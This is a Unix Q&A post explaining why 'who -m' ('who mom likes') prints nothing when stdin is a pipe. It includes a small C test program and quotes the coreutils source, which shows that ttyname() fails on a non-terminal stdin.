In a program I'm writing, I fork() and execl() to determine who mom likes. I noticed that if I set up pipes to write to who's stdin, it produces no output. If I don't set up pipes to write to stdin, then who produces output as normal. (Yes, I know, writing to who's stdin is pointless; it was residual code from executing other processes that made me discover this.)
Investigating this, I wrote this simple program (edit: for a simpler example, just run: true | who mom likes):
$ cat t.c:
#include <unistd.h>
#include <assert.h>
int main()
{
int stdin_pipe[2];
assert( pipe(stdin_pipe) == 0);
assert( dup2(stdin_pipe[0], STDIN_FILENO) != -1);
assert( close(stdin_pipe[0]) == 0);
assert( close(stdin_pipe[1]) == 0);
execl("/usr/bin/who", "/usr/bin/who", "mom", "likes", (char*)NULL);
return 0;
}
Compiling and running results in no output, which is what surprised me initially:
$ cc t.c
$ ./a.out
$
However, if I compile with -DNDEBUG (to remove the piping work in the assert()s) and run, it works:
$ cc -DNDEBUG t.c
$ ./a.out
batman pts/0 2014-08-15 12:57 (:0)
$
As soon as I call dup2(stdin_pipe[0], STDIN_FILENO), who stops producing output. The only explanation I could come up with is that dup2 affects the tty, and who uses the tty to determine who I am (given the -m flag prints "only hostname and user associated with stdin"). My main question is:
Why can't who mom likes/who am i/who -m determine who I am when I give it a pipe for stdin? What mechanism is it using to determine its information, and why does using a pipe ruin this mechanism? I know it's using stdin somehow, but I don't understand exactly how or exactly why stdin being a pipe matters.
Let's look at the source code for GNU coreutils who:
if (my_line_only)
{
ttyname_b = ttyname (STDIN_FILENO);
if (!ttyname_b)
return;
if (STRNCMP_LIT (ttyname_b, DEV_DIR_WITH_TRAILING_SLASH) == 0)
ttyname_b += DEV_DIR_LEN; /* Discard /dev/ prefix. */
}
When -m (my_line_only) is used, who finds the tty device connected to stdin, and then proceeds to find the entry for that tty in utmp.
When stdin is not a terminal, there is no name to look up in utmp, so it exits without printing anything.
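You can observe the same thing outside of who with a few lines of C. This is a sketch only, and the helper name has_tty_name is invented for the example:

```c
#include <stddef.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if `fd` refers to a terminal with a name. */
int has_tty_name(int fd)
{
    const char *name = ttyname(fd);   /* NULL when fd is not a terminal */
    return name != NULL;
}
```

For the read end of a pipe this returns 0, which corresponds to the early return in the who source quoted above.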

Resources